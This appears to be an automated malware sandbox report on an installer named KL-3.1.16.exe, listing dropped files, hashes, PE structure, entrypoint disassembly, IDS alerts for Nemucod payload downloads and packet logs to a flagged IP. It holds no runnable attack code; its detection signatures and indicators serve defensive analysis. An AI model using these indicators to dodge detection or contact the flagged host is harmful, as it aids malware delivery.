Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ylf1yvym.q5i.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yssvknjl.mof.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zcxxbgiw.hii.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zevy5xix.lhy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zxphk5vy.310.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\IRIMG1.JPG

Download File

Process:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 497x63, components 3
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	7.670995643119166
Encrypted:	false
SSDEEP:	48:o9YMAuERADl78E1g3e2OHBTTxE4+NaEIT9paYvo6su:gh7EQVXgt+NYgTnw6X
MD5:	3220A6AEFB4FC719CC8849F060859169
SHA1:	85F624DEBCEFD45FDFDF559AC2510A7D1501B412
SHA-256:	988CF422CBF400D41C48FBE491B425A827A1B70691F483679C1DF02FB9352765
SHA-512:	5C45EA8F64B3CDFB262C642BD36B08C822427150D28977AF33C9021A6316B6EFED83F3172C16343FD703D351AF3966B06926E5B33630D51B723709712689881D
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....H.H.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......?...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...T.)..{-.I.U..i..P.U....)..J..9..A@.(Lu..k...5R.T......}..E&..$.O.P}..@>.}..L....,.....t......c...ar.Z\.....R...7 .....z......k.OS.Q.'....r..?...4.x...P.G..y....L.........\|....;z.a.4......SL...S.!.d+.3.....w..)..i.....{.......Hi....)._.~..q/..Ji..v@<.....ne......j..q..Q.C..}G.L".5I!]........._E..")..*..1.....SM...qj...j1.+...n..M:..C..j.H.....;...N..

C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\IRIMG2.JPG

Download File

Process:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS2 Windows, datetime=2008:07:08 14:20:15], baseline, precision 8, 166x312, components 3
Category:	dropped
Size (bytes):	29054
Entropy (8bit):	5.195708227193176
Encrypted:	false
SSDEEP:	384:wjV66AV66RU53DaYNg7y5fJ+dwd7L/dSivXHk4eo:wjs6As6R4aYyCfToi7R
MD5:	AC40DED6736E08664F2D86A65C47EF60
SHA1:	C352715BBF5AE6C93EEB30DF2C01B6F44FAEDAAA
SHA-256:	F35985FE1E46A767BE7DCEA35F8614E1EDD60C523442E6C2C2397D1E23DBD3EA
SHA-512:	2FBD1C6190743EA9EF86F4CB805508BD5FFE05579519AFAFB55535D27F04F73AA7C980875818778B1178F8B0F7C6F5615FBF250B78E528903950499BBE78AC32
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....H.H......Exif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS2 Windows.2008:07:08 14:20:15........................................8...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................U.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...J....X.Z..l.i.........jl....p............\\.I<...=..v.....(..A.%.P.'!."UI.I....z.u...wq..*..hc4kt.6R.7H.Z.[.#O..O

C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
File Type:	data
Category:	dropped
Size (bytes):	161080
Entropy (8bit):	5.979895207461525
Encrypted:	false
SSDEEP:	3072:7AW0HGl6b154HTuZZcwbMy1IrX4+ofXXkkA:70IYfXUn
MD5:	7315F80E3171A77180247742FFC817D2
SHA1:	A037ED27219079A1EEC2598AC8E604EB58F5BD92
SHA-256:	8B40B46493F24655E2584638E1A15A18D624B8BD405D6879C73D467110BE12F3
SHA-512:	B82F2F54EE9121872721A74B0AFC031ABFC45BE23F4066A87DE41BB891BCE828FEB321EBD264E8583FD3059767193608E003DAA204D3616519C593E770CD4E00
Malicious:	false
Reputation:	unknown
Preview:	........CGlobalIncludeLuaFile.........Constant Definitions..XMB_OK=0;..MB_OKCANCEL=1;..MB_ABORTRETRYIGNORE=2;..MB_YESNOCANCEL=3;..MB_YESNO=4;..MB_RETRYCANCEL=5;..MB_ICONNONE=0;..MB_ICONSTOP=16;..MB_ICONQUESTION=32;..MB_ICONEXCLAMATION=48;..MB_ICONINFORMATION=64;..MB_DEFBUTTON1=0;..MB_DEFBUTTON2=256;..MB_DEFBUTTON3=512;..IDOK=1;..IDCANCEL=2;..IDABORT=3;..IDIGNORE=5;..IDRETRY=4;..IDYES=6;..IDNO=7;..SW_HIDE=0;..SW_SHOWNORMAL=1;..SW_NORMAL=1;..SW_MAXIMIZE=3;..SW_MINIMIZE=6;..HKEY_CLASSES_ROOT=0;..HKEY_CURRENT_CONFIG=1;..HKEY_CURRENT_USER=2;..HKEY_LOCAL_MACHINE=3;..HKEY_USERS=4;..REG_NONE=0;..REG_SZ=1;..REG_EXPAND_SZ=2;..REG_BINARY=3;..REG_DWORD=4;..REG_DWORD_LITTLE_ENDIAN=4;..REG_DWORD_BIG_ENDIAN=5;..REG_LINK=6;..REG_MULTI_SZ=7;..REG_RESOURCE_LIST=8;..REG_FULL_RESOURCE_DESCRIPTOR=9;..REG_RESOURCE_REQUIREMENTS_LIST=10;..DLL_CALL_CDECL=0;..DLL_CALL_STDCALL=1;..DLL_RETURN_TYPE_INTEGER=0;..DLL_RETURN_TYPE_LONG=1;..DLL_RETURN_TYPE_STRING=2;..SUBMITWEB_POST=0;..SUBMITWEB_GET=1;..ACCESS_READ=1310

C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Download File

Process:	C:\Users\user\Desktop\KL-3.1.16.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5153280
Entropy (8bit):	6.264110671248182
Encrypted:	false
SSDEEP:	49152:aYjdIw1TJyn5PPXDFFCMvSn/yRe4AloH1/coSNs5QKvbeGktKpGw+BbwPiBqkd96:SPZYxnMe4V/cJtKpGvJc5twG
MD5:	2A7D5F8D3FB4AB753B226FD88D31453B
SHA1:	2BA2F1E7D4C5FF02A730920F0796CEE9B174820C
SHA-256:	879109AE311E9B88F930CE1C659F29EC0E338687004318661E604D0D3727E3CF
SHA-512:	FA520EBF9E2626008F479C6E8F472514980D105F917C48AD638A64177D77C82A651C34ED3F28F3E39E67F12E50920503B66E373B5E92CF606BC81DC62A6B3EA4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................5.....X.)......2......6......d/.........`...../..............".........4....d..+....d.......d+......d,.....Rich....................PE..d...3..O..........".......5...........%........@..............................P.....DAO...@.................................................H:H......pN.......K.\|H...........0O..,....................................................5.....87H.@....................text....5.......5................. ..`.rdata..*.....5.......5.............@..@.data.........H......vH.............@....pdata..\|H....K..J...~I.............@..@text....."....M..$....K.............@.. data.....K... N..L....K.............@..@.rsrc........pN......8L.............@..@.reloc.......0O.......L.............@..B........................................................................................................................................

C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll

Download File

Process:	C:\Users\user\Desktop\KL-3.1.16.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	337224
Entropy (8bit):	6.4846248169411185
Encrypted:	false
SSDEEP:	6144:J8bKN/3dhtovc2LAmB7jQaHU9ZW5NpFaQIuHmc6/nEPn:JqKN/NhKEIzdjQaHUe7OaME
MD5:	958103E55C74427E5C66D7E18F3BF237
SHA1:	CEA3FC512763DC2BA1CFA9B7CB7A46AE89D9FCD8
SHA-256:	3EA4A4C3C6DEA44D8917B342E93D653F59D93E1F552ACE16E97E43BB04E951D8
SHA-512:	02ED6E1F24EF8F7F1C0377FA86A3A494B8A4474472AB7001F7902F2F3AFA6CD975DC69FCAB6F5524545A67657ECCCFCD4ED2C95431843E9D50F2FFF4C5178DBE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d...d...d...C\..g...d.......m...M...m.n.u...m.x.....m.i.e...m.j.e...Richd...........................PE..d....\mL.........." .........R..............................................p......w...............................................P.......`...(............ ...2......H....`.......................................................................................text...H........................... ..`.rdata..F...........................@..@.data...DA......."..................@....pdata...2... ...4..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\inst.ini

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:y:y
MD5:	81051BCC2CF1BEDF378224B0A93E2877
SHA1:	BA8AB5A0280B953AA97435FF8946CBCBB2755A27
SHA-256:	7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
SHA-512:	1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
Malicious:	false
Reputation:	unknown
Preview:	..

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.745677172645315
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	KL-3.1.16.exe
File size:	21'267'097 bytes
MD5:	a741fbd12088e596142d3717b48502cf
SHA1:	0f42f37a6be6922f0f3ef7d751dedce6abce99bf
SHA256:	c88e2057d44ad73fa1d07ff1af68345ffeb3e153801e85ee4d294d5676a58de5
SHA512:	d52aafbddc42cbf7fb9bb4b7e2c53f4d1b34754b90bee7d0a882fe9c3910d90ff71decf14790e512bdf757b17bfdd80f1c47b51c919ff6eaf637e2fcfc3da35d
SSDEEP:	393216:cecugBlobQzoAb0m/oeLRIOoWdwUcdsKgbyyBkCfDrnya:LwRzoAb0NeNIl/kz/3
TLSH:	B727F15566E840E5D0BAC1358982CA2BD2F27C411B35C7CF40D17EAB3F376A24D2EB69
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>.V.P.V.P.V.P.M...i.P.M..._.P._..._.P.V.Q.2.P.M...O.P.M...W.P.M...W.P.RichV.P.........PE..d...L..O.........."......b.........

File Icon


Icon Hash:	1f71f5d4e8783187

Static PE Info

General

Entrypoint:	0x140002d1c
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x4FDA0E4C [Thu Jun 14 16:16:12 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	357b59ff56f808887438b8bd8ad0eaa6

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	27/09/2018 20:00:00 01/02/2020 18:59:59
Subject Chain	CN="Beijing Qihu Technology Co., Ltd.", OU=\u7814\u53d1\u90e8, O="Beijing Qihu Technology Co., Ltd.", L=Beijing, S=Beijing, C=CN
Version:	3
Thumbprint MD5:	E63D97F038C132F14F0E86E4383B7947
Thumbprint SHA-1:	A50E0BABE5EE7DC261B0C122A8641A37E1CE4CE3
Thumbprint SHA-256:	DBC27939DCD4AC7A333DD20BBC9AA254D0FFB691D2E0C2BD1F46A2ECF8C72002
Serial:	4733BB6089E32FCD224D0E49DEB663DA

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F8264B52F30h
dec eax
add esp, 28h
jmp 00007F8264B50D87h
int3
int3
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], esi
dec eax
mov dword ptr [esp+18h], edi
inc ecx
push esp
dec eax
sub esp, 20h
dec esp
lea esp, dword ptr [00009324h]
xor esi, esi
xor ebx, ebx
dec ecx
mov edi, esp
cmp dword ptr [edi+08h], 01h
jne 00007F8264B50F58h
dec eax
arpl si, ax
mov edx, 00000FA0h
inc esi
dec eax
lea ecx, dword ptr [eax+eax*4]
dec eax
lea eax, dword ptr [0000A232h]
dec eax
lea ecx, dword ptr [eax+ecx*8]
dec eax
mov dword ptr [edi], ecx
call dword ptr [000053FDh]
test eax, eax
je 00007F8264B50F58h
inc ebx
dec eax
add edi, 10h
cmp ebx, 24h
jl 00007F8264B50EFBh
mov eax, 00000001h
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
mov esi, dword ptr [esp+38h]
dec eax
mov edi, dword ptr [esp+40h]
dec eax
add esp, 20h
inc ecx
pop esp
ret
dec eax
arpl bx, ax
dec eax
add eax, eax
dec ecx
and dword ptr [esp+eax*8], 00000000h
xor eax, eax
jmp 00007F8264B50F0Dh
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], ebp
dec eax
mov dword ptr [esp+18h], esi
push edi
dec eax
sub esp, 20h
mov edi, 00000024h
dec eax
lea ebx, dword ptr [0000929Ch]
mov esi, edi
dec eax
mov ebp, dword ptr [ebx]
dec eax
test ebp, ebp
je 00007F8264B50F4Dh
cmp dword ptr [ebx+08h], 01h
je 00007F8264B50F47h

Rich Headers

Programming Language:

[ C ] VS2010 SP1 build 40219
[ASM] VS2010 SP1 build 40219
[IMP] VS2008 SP1 build 30729
[C++] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xaf7c	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10000	0x5977f	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xf000	0x5d0	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x1444dd1	0x34c8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6a000	0x22c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2f8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x61d3	0x6200	46565b91f365f59e95911f623cd509ca	False	0.5916374362244898	data	6.245804251873142	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x3948	0x3a00	9a2a098011201debfdbe2790cfc39397	False	0.3455010775862069	dBase III DBT, version number 0, next free block index 46396, 1st item "j\267"	4.71737238820107	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0x2200	0x1000	ffa6e0e76a954e6a3fd657281ecc2607	False	0.1767578125	data	2.232690021204779	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0xf000	0x5d0	0x600	b0c923173cdcf0b82f939c3fafc6e4d7	False	0.4954427083333333	data	4.252873747775349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x10000	0x5977f	0x59800	6b46f1994f3286b5f5f543cf6caa132a	False	0.1346783344972067	data	3.4289027278425395	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6a000	0x3de	0x400	3e80cb8268adc697616a87179e434ae9	False	0.3896484375	data	3.553072991109634	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x10490	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"			0.4772727272727273
RT_BITMAP	0x105c4	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768			0.10024752475247525
RT_ICON	0x108ec	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors			0.4525586353944563
RT_ICON	0x11794	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors			0.506768953068592
RT_ICON	0x1203c	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors			0.4082369942196532
RT_ICON	0x125a4	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336			0.09903985560848597
RT_ICON	0x545cc	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584			0.17221696439134035
RT_ICON	0x64df4	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600			0.3328838174273859
RT_ICON	0x6739c	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224			0.41721388367729834
RT_ICON	0x68444	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088			0.5780141843971631
RT_DIALOG	0x688ac	0xfc	data	Chinese	China	0.7222222222222222
RT_STRING	0x689a8	0x114	Matlab v4 mat-file (little endian) 6, numeric, rows 0, columns 0	Chinese	China	0.7318840579710145
RT_STRING	0x68abc	0x340	data	Chinese	China	0.3233173076923077
RT_STRING	0x68dfc	0xe8	data	Chinese	China	0.6724137931034483
RT_RCDATA	0x68ee4	0x80	data	English	United States	1.0859375
RT_GROUP_CURSOR	0x68f64	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_ICON	0x68f78	0x76	data			0.6610169491525424
RT_VERSION	0x68ff0	0x2bc	data	Chinese	China	0.49714285714285716
RT_MANIFEST	0x692ac	0x4d3	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.47692307692307695

Imports

DLL	Import
KERNEL32.dll	_lclose, GetModuleFileNameA, _lread, _llseek, _lopen, _lwrite, _lcreat, CreateDirectoryA, SetCurrentDirectoryA, lstrcatA, FreeLibrary, GetProcAddress, LoadLibraryA, GetDiskFreeSpaceA, GetFileAttributesA, RemoveDirectoryA, DeleteFileA, lstrlenA, GetCurrentDirectoryA, CloseHandle, GetExitCodeProcess, GetLastError, LocalFree, GetCurrentProcess, MoveFileExA, Sleep, GetStringTypeW, MultiByteToWideChar, LCMapStringW, HeapReAlloc, HeapSize, IsValidCodePage, lstrcpyA, GetTempPathA, CompareStringA, GetOEMCP, GetACP, GetModuleHandleW, ExitProcess, DecodePointer, HeapFree, HeapAlloc, GetCommandLineA, GetStartupInfoW, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, EncodePointer, LoadLibraryW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, TerminateProcess, FlsGetValue, FlsSetValue, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, RtlUnwindEx, WriteFile, GetStdHandle, GetModuleFileNameW, HeapSetInformation, GetVersion, HeapCreate, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo
USER32.dll	TranslateMessage, DispatchMessageA, PeekMessageA, wsprintfA, LoadCursorA, SetCursor, MessageBoxA, MsgWaitForMultipleObjects
ADVAPI32.dll	GetTokenInformation, OpenProcessToken
SHELL32.dll	ShellExecuteExA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-29T16:07:19.597484+0100	2022482	ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01	1	192.168.2.6	49735	104.21.81.224	80	TCP
2024-12-29T16:07:21.893979+0100	2022482	ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01	1	192.168.2.6	49744	104.21.81.224	443	TCP
2024-12-29T16:07:22.251740+0100	2022482	ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01	1	192.168.2.6	49735	104.21.81.224	80	TCP
2024-12-29T16:07:24.887196+0100	2022482	ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01	1	192.168.2.6	49750	104.21.81.224	443	TCP
2024-12-29T16:07:25.170988+0100	2021954	ET MALWARE JS/Nemucod.M.gen downloading EXE payload	1	104.21.81.224	443	192.168.2.6	49750	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 29, 2024 16:07:18.327593088 CET	49735	80	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:18.448435068 CET	80	49735	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:18.448523998 CET	49735	80	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:18.448807955 CET	49735	80	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:18.570557117 CET	80	49735	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:19.595801115 CET	80	49735	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:19.597484112 CET	49735	80	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:19.659631968 CET	49744	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:19.659703970 CET	443	49744	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:19.659780025 CET	49744	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:19.714540005 CET	49744	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:19.714572906 CET	443	49744	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:20.995513916 CET	443	49744	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:20.995593071 CET	49744	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:21.056134939 CET	49744	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:21.056185961 CET	443	49744	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:21.057149887 CET	443	49744	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:21.057245016 CET	49744	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:21.058924913 CET	49744	443	192.168.2.6	104.21.81.224
